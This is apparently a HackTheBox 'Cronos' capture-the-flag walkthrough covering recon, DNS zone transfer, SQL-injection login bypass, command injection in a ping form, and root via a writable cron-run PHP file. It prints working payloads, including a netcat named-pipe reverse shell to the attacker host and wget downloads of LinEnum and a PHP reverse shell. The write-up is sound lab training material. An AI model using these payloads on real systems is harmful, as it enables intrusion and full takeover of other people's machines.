HacktheBox - Cronos Writeup

06/11/2019

Zero to OSCP Hero Writeup #13 - Cronos

Reconnaissance

1. Nmap Scan - TCP Scan

Let's start with a TCP scan of the target ip address to determine which ports are open and which services are running on those ports:

nmap -sC -sV -oA nmap/initial.tcp 10.10.10.13

  • -sC: Run the default nmap script scan to find potential vulnerabilities
  • -sV: Detect the service version
  • -oA: Output the result of the scan in all formats as nmap/initial.tcp

We have SSH, DNS and HTTP running on this machine. 

2. Nmap Scan - All TCP Ports Scan

Okay, lets scan the entire TCP port range to confirm that there are no other ports open:

nmap -sC -sV -p- -oA nmap/full.tcp 10.10.10.13

  • -sC: Run the default nmap script scan to find potential vulnerabilities
  • -sV: Detect the service version
  • -p-: Run the nmap scan against all ports
  • -oA: Output the result of the scan in all formats as nmap/full.tcp

The full TCP scan confirmed that there are no addional ports open.

3. Nmap Scan - All UDP Ports Scan

We can do the same full port scan, but with the UDP ports:

nmap -sU -p- -oA nmap/full.udp 10.10.10.13

  • -sU: Run the scan against UDP ports
  • -p-: Run the nmap scan against all ports
  • -oA: Output the result of the scan in all formats as nmap/full.tcp

The full UDP scan confirmed that there are no additional ports open.  

Enumeration - Port 80 

1. Browse to 10.10.10.13 

Lets start with the web server, and as we saw in the nmap scan, it just shows the default apache page. 

2. Gobuster

As there is nothing interesting from the default page, lets use gobuster to search for any hidden directories. 

gobuster dir -u https://10.10.10.13 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

Nothing of note found here. 

Enumeration - Port 53 

As there was nothing of note found initially on port 80, lets see if there is anything to find from port 53, DNS. 

DNS is used to translate human readable hostnames like www.google.com to an IP address. 

1. Checking for DNS Zone Transfers

Lets see if this DNS server allows DNS Zone Transfers: 

dig axfr @10.10.10.13 crons.htb 

I used the domain, cronos.htb as the <machine>.htb syntax is common for most hackthebox machines

Bingo!

We have found that DNS Zone Transfers are allowed and we also have the subdomain infomation of crons.htb

2. Adding domains to /etc/hosts file

To browse to the found subdomains, we need to add them to our /etc/hosts file:

nano /etc/hosts

10.10.10.13 www.cronos.htb cronos.htb ns1.cronos.htb admin.cronos.htb

Enumeration - admin.cronos.htb 

Lets start to enumerate the most interesting subdomain found, admin.cronos.htb

Okay, so a basic login page that doesnt accept any of my combinations of basic credentials... 

1. Testing for SQL Injection 

So before i run sqlmap on the login page, i like to just try basic sqli commands in the user input fields, so i used admin' or 1=1; -- in the username field and it logged me in!  

The SQL Injection only worked on the username field, and not the password field. 

3. Testing The Net Tool Functionality

As we can see, there are two given options here to test networking connectivity, traceroute and ping. 

When trying to run the traceroute command on 8.8.8.8, it just hangs but when trying the ping option, we get a result returned. 

Now, lets see if we can ping our attacker machine... and we can! 

4. Confirm Command Injection Vulnerability 

Running system commands through a web application can be dangerous as it may give the attacker a chance to inject their own commands, and it seems cronos has this problem! 

10.10.14.32; whoami

Initial Foothold - User

1. Exploit Command Injection

Now that we have confirmed that we can enter system commands through the ping option, we can now try and enter a reverse shell command, im going to use the netcat one from pentestmonkey:

10.10.14.32; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.32 9001 >/tmp/f

Start a netcat listener: 

nc -lvnp 9001 

Execute the ping command... and we now have a connection on our netcat listener as www-data! 

Make the shell fully interactive: 

https://forum.hackthebox.eu/discussion/142/obtaining-a-fully-interactive-shell

We can now grab the user.txt flag from the /home/noulis directory: 

cat user.txt 

Privilege Escalation - Root

1. Using LinEnum to enumerate the machine

 Now that we have an initial foothold on the machine, im going to use the automated enumeration script, LinEnum.sh 

To get this on the machine, we need to first start a http server on our attacker machine in the directory of LinEnum: 

python -m SimpleHTTPServer 80 

Then on the cronos machine, we can use wget to download the script:

wget 10.10.14.32/LinEnum.sh 

Make the script executable and run it: 

chmod +x LinEnum.sh 

./LinEnum.sh 

2. Checking crontab file

From the output of the scan, there is an entry in the crontab table that shows the file artisan is being executed by root using php. 

Lets check the permissions of the artisan folder: 

cd /var/www/laravel/

ls -l

It shows here that www-data is the owner of the file, meaning we can read, write and execute the file. 

3. Copying php reverse shell to artisan file

 As we know the file will be executed using php, lets edit the php-reverse-shell.php file on our attacker machine and download it from the cronos machine: 

nano php-reverse-shell.php

Start a http server in the php rev shell directory:

python -m SimpleHTTPServer 8081

Download the file using wget on the cronos machine: 

wget 10.10.14.32:8081/php-reverse-shell.php

Copy the reverse shell to the artisan file:

cp /tmp/php-reverse-shell.php artisan

Start a netcat listener on our attacker machine: 

nc -lvnp 9002

and after a few seconds, we get a connection to our listener, as root!

Make the shell fully interactive: 

https://forum.hackthebox.eu/discussion/142/obtaining-a-fully-interactive-shell

We can now grab the root.txt flag! 

What did I learn from Cronos?

Giving users the ability to run system commands in a web application can be dangerous if not properly implemented, running a vulnerable linux version can expose you to kernel exploits and running a cronjob as root when lower priv users can write and execute the file in the crontable is asking for trouble! 

Conclusion

Thanks for reading! Next up is Box #14 - Arctic!